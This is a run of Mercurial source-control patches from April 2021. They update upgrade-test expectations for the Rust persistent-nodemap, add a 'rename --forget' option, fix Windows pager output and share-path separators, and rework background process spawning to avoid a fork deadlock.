#endif diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -61,7 +61,8 @@ generaldelta: yes share-safe: no sparserevlog: yes - persistent-nodemap: no + persistent-nodemap: no (no-rust !) + persistent-nodemap: yes (rust !) copies-sdc: no revlog-v2: no plain-cl-delta: yes @@ -74,7 +75,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -88,7 +90,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -102,7 +105,8 @@ [formatvariant.name.uptodate|generaldelta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|sparserevlog: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] (no-rust !) + [formatvariant.name.mismatchdefault|persistent-nodemap:][formatvariant.repo.mismatchdefault| yes][formatvariant.config.special| yes][formatvariant.default| no] (rust !) 
[formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] @@ -142,10 +146,12 @@ "repo": true }, { - "config": false, + "config": false, (no-rust !) + "config": true, (rust !) "default": false, "name": "persistent-nodemap", - "repo": false + "repo": false (no-rust !) + "repo": true (rust !) }, { "config": false, @@ -184,7 +190,8 @@ performing an upgrade with "--run" will make the following changes: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) processed revlogs: - all-filelogs @@ -208,7 +215,8 @@ $ hg debugupgraderepo --quiet requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) processed revlogs: - all-filelogs @@ -223,7 +231,8 @@ performing an upgrade with "--run" will make the following changes: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) 
optimisations: re-delta-parent @@ -254,7 +263,8 @@ performing an upgrade with "--run" will make the following changes: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -279,7 +289,8 @@ $ hg debugupgrade --optimize re-delta-parent --quiet requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -323,7 +334,8 @@ generaldelta: no yes yes share-safe: no no no sparserevlog: no yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: no yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -337,7 +349,8 @@ generaldelta: no no yes share-safe: no no no sparserevlog: no no yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: no yes no (rust !) 
copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -351,7 +364,8 @@ [formatvariant.name.mismatchdefault|generaldelta: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.mismatchdefault|sparserevlog: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] - [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] (no-rust !) + [formatvariant.name.mismatchconfig|persistent-nodemap:][formatvariant.repo.mismatchconfig| no][formatvariant.config.special| yes][formatvariant.default| no] (rust !) [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] @@ -373,12 +387,16 @@ sparserevlog in order to limit disk reading and memory usage on older version, the span of a delta chain from its root to its end is limited, whatever the relevant data in this span. This can severly limit Mercurial ability to build good chain of delta resulting is much more storage space being taken and limit reusability of on disk delta during exchange. + persistent-nodemap (rust !) + persist the node -> rev mapping on disk to speedup lookup (rust !) + (rust !) 
performing an upgrade with "--run" will make the following changes: requirements preserved: revlogv1, store - added: dotencode, fncache, generaldelta, sparserevlog + added: dotencode, fncache, generaldelta, sparserevlog (no-rust !) + added: dotencode, fncache, generaldelta, persistent-nodemap, sparserevlog (rust !) fncache repository will be more resilient to storing certain paths and performance of certain operations should be improved @@ -392,6 +410,9 @@ sparserevlog Revlog supports delta chain with more unused data between payload. These gaps will be skipped at read time. This allows for better delta chains, making a better compression and faster exchange with server. + persistent-nodemap (rust !) + Speedup revision lookup by node id. (rust !) + (rust !) processed revlogs: - all-filelogs - changelog @@ -414,7 +435,8 @@ $ hg debugupgraderepo --quiet requirements preserved: revlogv1, store - added: dotencode, fncache, generaldelta, sparserevlog + added: dotencode, fncache, generaldelta, sparserevlog (no-rust !) + added: dotencode, fncache, generaldelta, persistent-nodemap, sparserevlog (rust !) processed revlogs: - all-filelogs @@ -434,6 +456,9 @@ sparserevlog in order to limit disk reading and memory usage on older version, the span of a delta chain from its root to its end is limited, whatever the relevant data in this span. This can severly limit Mercurial ability to build good chain of delta resulting is much more storage space being taken and limit reusability of on disk delta during exchange. + persistent-nodemap (rust !) + persist the node -> rev mapping on disk to speedup lookup (rust !) + (rust !) repository lacks features used by the default config options: dotencode @@ -444,7 +469,8 @@ requirements preserved: revlogv1, store - added: fncache, generaldelta, sparserevlog + added: fncache, generaldelta, sparserevlog (no-rust !) + added: fncache, generaldelta, persistent-nodemap, sparserevlog (rust !) 
fncache repository will be more resilient to storing certain paths and performance of certain operations should be improved @@ -455,6 +481,9 @@ sparserevlog Revlog supports delta chain with more unused data between payload. These gaps will be skipped at read time. This allows for better delta chains, making a better compression and faster exchange with server. + persistent-nodemap (rust !) + Speedup revision lookup by node id. (rust !) + (rust !) processed revlogs: - all-filelogs - changelog @@ -513,7 +542,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, revlogv1, store + preserved: dotencode, fncache, revlogv1, store (no-rust !) + preserved: dotencode, fncache, persistent-nodemap, revlogv1, store (rust !) added: generaldelta generaldelta @@ -554,6 +584,7 @@ $ cat .hg/upgradebackup.*/requires dotencode fncache + persistent-nodemap (rust !) revlogv1 store @@ -563,6 +594,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 store @@ -614,7 +646,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: sparserevlog sparserevlog @@ -655,7 +688,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -732,7 +766,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) 
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -782,7 +817,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -831,7 +867,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -884,7 +921,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) removed: sparserevlog optimisations: re-delta-parent @@ -938,7 +976,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: sparserevlog optimisations: re-delta-parent @@ -1003,7 +1042,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) 
optimisations: re-delta-fulladd @@ -1066,6 +1106,7 @@ fncache generaldelta largefiles + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1077,6 +1118,7 @@ fncache generaldelta largefiles + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1166,7 +1208,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-all @@ -1226,6 +1269,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 store @@ -1234,7 +1278,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: sparserevlog processed revlogs: @@ -1246,6 +1291,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1255,7 +1301,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) removed: sparserevlog processed revlogs: @@ -1267,6 +1314,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 store @@ -1281,7 +1329,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) 
added: revlog-compression-zstd, sparserevlog processed revlogs: @@ -1296,7 +1345,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -1307,6 +1357,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd revlogv1 sparserevlog @@ -1318,7 +1369,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) removed: revlog-compression-zstd processed revlogs: @@ -1333,7 +1385,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -1344,6 +1397,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1358,7 +1412,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) added: revlog-compression-zstd processed revlogs: @@ -1373,7 +1428,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) 
copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -1384,6 +1440,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd revlogv1 sparserevlog @@ -1401,7 +1458,8 @@ requirements preserved: dotencode, fncache, generaldelta, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !) removed: revlogv1 added: exp-revlogv2.2, exp-sidedata-flag (zstd !) added: exp-revlogv2.2, exp-sidedata-flag, sparserevlog (no-zstd !) @@ -1418,7 +1476,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: yes no no plain-cl-delta: yes yes yes @@ -1431,6 +1490,7 @@ exp-sidedata-flag fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) sparserevlog store @@ -1446,7 +1506,8 @@ requirements preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !) removed: exp-revlogv2.2, exp-sidedata-flag added: revlogv1 @@ -1462,7 +1523,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) 
copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -1473,6 +1535,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -1490,7 +1553,8 @@ requirements preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !) removed: revlogv1 added: exp-revlogv2.2, exp-sidedata-flag @@ -1506,7 +1570,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: yes yes no plain-cl-delta: yes yes yes @@ -1519,6 +1584,7 @@ exp-sidedata-flag fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) sparserevlog store # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617982339 14400 # Fri Apr 09 11:32:19 2021 -0400 # Node ID fc8a5c9ecee0877c01280ccb775387efd2bd62e6 # Parent cc3ad5c3af3bfabcaaacd2b4cc38cf865bc5be07 win32: enable legacy I/O mode to fix missing pager output on Windows with py3 The equivalent interpreter option is set by wrapper.exe, but this *.bat file is what gets installed in a venv. Without this mode, any command that spins up a pager has no output, unless the pager is explicitly disabled. The variable is set inside the `setlocal` scope to keep it from leaking into the environment after the bat file exits. We should probably still figure out how to ship a compiled hg.exe when installing with `pip`, because the binary does other things like enable long filename support. 
But this avoids the dangerous and confusing lack of output in the meantime. Differential Revision: https://phab.mercurial-scm.org/D10354 diff --git a/contrib/win32/hg.bat b/contrib/win32/hg.bat --- a/contrib/win32/hg.bat +++ b/contrib/win32/hg.bat @@ -4,6 +4,8 @@ setlocal set HG=%~f0 +set PYTHONLEGACYWINDOWSSTDIO=1 + rem Use a full path to Python (relative to this script) if it exists, rem as the standard Python install does not put python.exe on the PATH... rem Otherwise, expect that python.exe can be found on the PATH. # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1617983200 25200 # Fri Apr 09 08:46:40 2021 -0700 # Node ID 37f49d46239448523e6dfbbe9bc07b71150b3317 # Parent fc8a5c9ecee0877c01280ccb775387efd2bd62e6 rename: add --forget option and stop suggesting `hg revert` for undoing Differential Revision: https://phab.mercurial-scm.org/D10355 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -2413,7 +2413,8 @@ To undo marking a destination file as copied, use --forget. With that option, all given (positional) arguments are unmarked as copies. The - destination file(s) will be left in place (still tracked). + destination file(s) will be left in place (still tracked). Note that + :hg:`copy --forget` behaves the same way as :hg:`rename --forget`. This command takes effect with the next commit by default. @@ -5914,6 +5915,7 @@ @command( b'rename|move|mv', [ + (b'', b'forget', None, _(b'unmark a destination file as renamed')), (b'A', b'after', None, _(b'record a rename that has already occurred')), ( b'', @@ -5945,8 +5947,13 @@ exist in the working directory. If invoked with -A/--after, the operation is recorded, but no copying is performed. - This command takes effect at the next commit. To undo a rename - before that, see :hg:`revert`. + To undo marking a destination file as renamed, use --forget. 
With that + option, all given (positional) arguments are unmarked as renames. The + destination file(s) will be left in place (still tracked). The source + file(s) will not be restored. Note that :hg:`rename --forget` behaves + the same way as :hg:`copy --forget`. + + This command takes effect with the next commit by default. Returns 0 on success, 1 if errors are encountered. """ diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -361,7 +361,7 @@ push: force, rev, bookmark, all-bookmarks, branch, new-branch, pushvars, publish, ssh, remotecmd, insecure recover: verify remove: after, force, subrepos, include, exclude, dry-run - rename: after, at-rev, force, include, exclude, dry-run + rename: forget, after, at-rev, force, include, exclude, dry-run resolve: all, list, mark, unmark, no-status, re-merge, tool, include, exclude, template revert: all, date, rev, no-backup, interactive, include, exclude, dry-run rollback: dry-run, force diff --git a/tests/test-copy.t b/tests/test-copy.t --- a/tests/test-copy.t +++ b/tests/test-copy.t @@ -277,19 +277,25 @@ $ rm baz xyzzy -Test unmarking copy of a single file +Test unmarking copy/rename of a single file # Set up by creating a copy $ hg cp bar baz -# Test uncopying a non-existent file +# Test unmarking as copy a non-existent file $ hg copy --forget non-existent non-existent: $ENOENT$ -# Test uncopying an tracked but unrelated file + $ hg rename --forget non-existent + non-existent: $ENOENT$ +# Test unmarking as copy an tracked but unrelated file $ hg copy --forget foo foo: not unmarking as copy - file is not marked as copied -# Test uncopying a copy source + $ hg rename --forget foo + foo: not unmarking as copy - file is not marked as copied +# Test unmarking as copy a copy source $ hg copy --forget bar bar: not unmarking as copy - file is not marked as copied + $ hg rename --forget bar + bar: not unmarking as copy - file is not marked as copied # baz 
should still be marked as a copy $ hg st -C A baz @@ -298,17 +304,38 @@ $ hg copy --forget baz $ hg st -C A baz -# Test uncopy with matching an non-matching patterns + $ rm bar + $ hg rename --after bar baz + $ hg st -C + A baz + bar + R bar + $ hg rename --forget baz + $ hg st -C + A baz + R bar + $ hg revert bar +# Test unmarking as copy with matching an non-matching patterns $ hg cp bar baz --after $ hg copy --forget bar baz bar: not unmarking as copy - file is not marked as copied + $ hg cp bar baz --after + $ hg rename --forget bar baz + bar: not unmarking as copy - file is not marked as copied $ hg st -C A baz -# Test uncopy with no exact matches +# Test unmarking as copy with no exact matches $ hg cp bar baz --after $ hg copy --forget . $ hg st -C A baz + $ hg cp bar baz --after + $ hg st -C + A baz + bar + $ hg rename --forget . + $ hg st -C + A baz $ hg forget baz $ rm baz # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1617962571 -7200 # Fri Apr 09 12:02:51 2021 +0200 # Node ID 6d5a26e94d9ee9816f1b9a45b22f55ed1b2b7ab0 # Parent 37f49d46239448523e6dfbbe9bc07b71150b3317 unit-tests: Fix `cargo test` on 32-bit platforms Fixes https://bz.mercurial-scm.org/show_bug.cgi?id=6506 This makes `IndexEntryBuilder::build`, which is only used in unit tests, use `u32` or `u64` instead of platform-dependent `usize` when packing binary data to be used at test input. To run Rust unit tests in 32-bit mode in a x86-64 environment, use: rustup target add i686-unknown-linux-gnu # Once (cd rust && cargo test --target i686-unknown-linux-gnu) Differential Revision: https://phab.mercurial-scm.org/D10351 diff --git a/rust/hg-core/src/revlog/index.rs b/rust/hg-core/src/revlog/index.rs --- a/rust/hg-core/src/revlog/index.rs +++ b/rust/hg-core/src/revlog/index.rs @@ -300,12 +300,12 @@ // Remaining offset bytes. bytes.extend(&[0u8; 2]); } else { - // Offset is only 6 bytes will usize is 8. 
- bytes.extend(&self.offset.to_be_bytes()[2..]); + // Offset stored on 48 bits (6 bytes) + bytes.extend(&(self.offset as u64).to_be_bytes()[2..]); } bytes.extend(&[0u8; 2]); // Revision flags. - bytes.extend(&self.compressed_len.to_be_bytes()[4..]); - bytes.extend(&self.uncompressed_len.to_be_bytes()[4..]); + bytes.extend(&(self.compressed_len as u32).to_be_bytes()); + bytes.extend(&(self.uncompressed_len as u32).to_be_bytes()); bytes.extend(&self.base_revision.to_be_bytes()); bytes } # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617921788 14400 # Thu Apr 08 18:43:08 2021 -0400 # Node ID 218a26df7813fee76632a483860f54cd09798a13 # Parent 6d5a26e94d9ee9816f1b9a45b22f55ed1b2b7ab0 share: store relative share paths with '/' separators I created a relative share in Windows and tried to use it in WSL, and it failed: abort: .hg/sharedpath points to nonexistent directory /mnt/c/Users/Matt/hg-review/.hg/..\..\hg\.hg Use `normpath` on the read side so that the code has the usual Windows style paths it always had (I don't think that matters much), but it also eliminates the directory escaping path components in the case where the path is printed. This will not fix repositories that have already been created, but it's trivial enough to hand edit the file to correct it. Differential Revision: https://phab.mercurial-scm.org/D10330 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -469,7 +469,7 @@ # ``.hg/`` for ``relshared``. 
sharedpath = hgvfs.read(b'sharedpath').rstrip(b'\n') if requirementsmod.RELATIVE_SHARED_REQUIREMENT in requirements: - sharedpath = hgvfs.join(sharedpath) + sharedpath = util.normpath(hgvfs.join(sharedpath)) sharedvfs = vfsmod.vfs(sharedpath, realpath=True) @@ -3672,6 +3672,7 @@ if createopts.get(b'sharedrelative'): try: sharedpath = os.path.relpath(sharedpath, hgvfs.base) + sharedpath = util.pconvert(sharedpath) except (IOError, ValueError) as e: # ValueError is raised on Windows if the drive letters differ # on each path. # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1600049665 14400 # Sun Sep 13 22:14:25 2020 -0400 # Node ID 8759e22f1649cd71a59d05e8f5ef8dce77ca4b44 # Parent 218a26df7813fee76632a483860f54cd09798a13 procutil: avoid using os.fork() to implement runbgcommand We ran into the following deadlock: - some command creates an ssh peer, then raises without explicitly closing the peer (hg id + extension in our case) - dispatch catches the exception, calls ui.log('commandfinish', ..) (the sshpeer is still not closed), which calls logtoprocess, which calls procutil.runbgcommand. - in the child of runbgcommand's fork(), between the fork and the exec, the opening of file descriptors triggers a gc which runs the destructor for sshpeer, which waits on ssh's stderr being closed, which never happens since ssh's stderr is held open by the parent of the fork where said destructor hasn't run Remotefilelog appears to have a hack around this deadlock as well. I don't know if there's more subtlety to it, because even though the problem is determistic, it is very fragile, so I didn't manage to reduce it. I can imagine three ways of tackling this problem: 1. don't run any python between fork and exec in runbgcommand 2. make the finalizer harmless after the fork 3. close the peer without relying on gc behavior This commit goes with 1, as forking without exec'ing is tricky in general in a language with gc finalizers. 
And maybe it's better in the presence of rust threads. A future commit will try 2 or 3. Performance wise: at low memory usage, it's an improvement. At higher memory usage, it's about 2x faster than before when ensurestart=True, but 2x slower when ensurestart=False. Not sure if that matters. The reason for that last bit is that the subprocess.Popen always waits for the execve to finish, and at high memory usage, execve is slow because it deallocates the large page table. Numbers and script: before after mem=1.0GB, ensurestart=True 52.1ms 26.0ms mem=1.0GB, ensurestart=False 14.7ms 26.0ms mem=0.5GB, ensurestart=True 23.2ms 11.2ms mem=0.5GB, ensurestart=False 6.2ms 11.3ms mem=0.2GB, ensurestart=True 15.7ms 7.4ms mem=0.2GB, ensurestart=False 4.3ms 8.1ms mem=0.0GB, ensurestart=True 2.3ms 0.7ms mem=0.0GB, ensurestart=False 0.8ms 0.8ms import time for memsize in [1_000_000_000, 500_000_000, 250_000_000, 0]: mem = 'a' * memsize for ensurestart in [True, False]: now = time.time() n = 100 for i in range(n): procutil.runbgcommand([b'true'], {}, ensurestart=ensurestart) after = time.time() ms = (after - now) / float(n) * 1000 print(f'mem={memsize / 1e9:.1f}GB, ensurestart={ensurestart} -> {ms:.1f}ms') Differential Revision: https://phab.mercurial-scm.org/D9019 diff --git a/mercurial/utils/procutil.py b/mercurial/utils/procutil.py --- a/mercurial/utils/procutil.py +++ b/mercurial/utils/procutil.py @@ -701,7 +701,88 @@ else: - def runbgcommand( + def runbgcommandpy3( + cmd, + env, + shell=False, + stdout=None, + stderr=None, + ensurestart=True, + record_wait=None, + stdin_bytes=None, + ): + """Spawn a command without waiting for it to finish. + + + When `record_wait` is not None, the spawned process will not be fully + detached and the `record_wait` argument will be called with a the + `Subprocess.wait` function for the spawned process. This is mostly + useful for developers that need to make sure the spawned process + finished before a certain point. 
(eg: writing test)""" + if pycompat.isdarwin: + # avoid crash in CoreFoundation in case another thread + # calls gui() while we're calling fork(). + gui() + + if shell: + script = cmd + else: + if isinstance(cmd, bytes): + cmd = [cmd] + script = b' '.join(shellquote(x) for x in cmd) + if record_wait is None: + # double-fork to completely detach from the parent process + script = b'( %s ) &' % script + start_new_session = True + else: + start_new_session = False + ensurestart = True + + try: + if stdin_bytes is None: + stdin = subprocess.DEVNULL + else: + stdin = pycompat.unnamedtempfile() + stdin.write(stdin_bytes) + stdin.flush() + stdin.seek(0) + if stdout is None: + stdout = subprocess.DEVNULL + if stderr is None: + stderr = subprocess.DEVNULL + + p = subprocess.Popen( + script, + shell=True, + env=env, + close_fds=True, + stdin=stdin, + stdout=stdout, + stderr=stderr, + start_new_session=start_new_session, + ) + except Exception: + if record_wait is not None: + record_wait(255) + raise + finally: + if stdin_bytes is not None: + stdin.close() + if not ensurestart: + # Even though we're not waiting on the child process, + # we still must call waitpid() on it at some point so + # it's not a zombie/defunct. This is especially relevant for + # chg since the parent process won't die anytime soon. + # We use a thread to make the overhead tiny. + t = threading.Thread(target=lambda: p.wait) + t.daemon = True + t.start() + else: + returncode = p.wait + if record_wait is not None: + record_wait(returncode) + + def runbgcommandpy2( cmd, env, shell=False, @@ -811,3 +892,14 @@ stdin.close() if record_wait is None: os._exit(returncode) + + if pycompat.ispy3: + # This branch is more robust, because it avoids running python + # code (hence gc finalizers, like sshpeer.__del__, which + # blocks). But we can't easily do the equivalent in py2, + # because of the lack of start_new_session=True flag. 
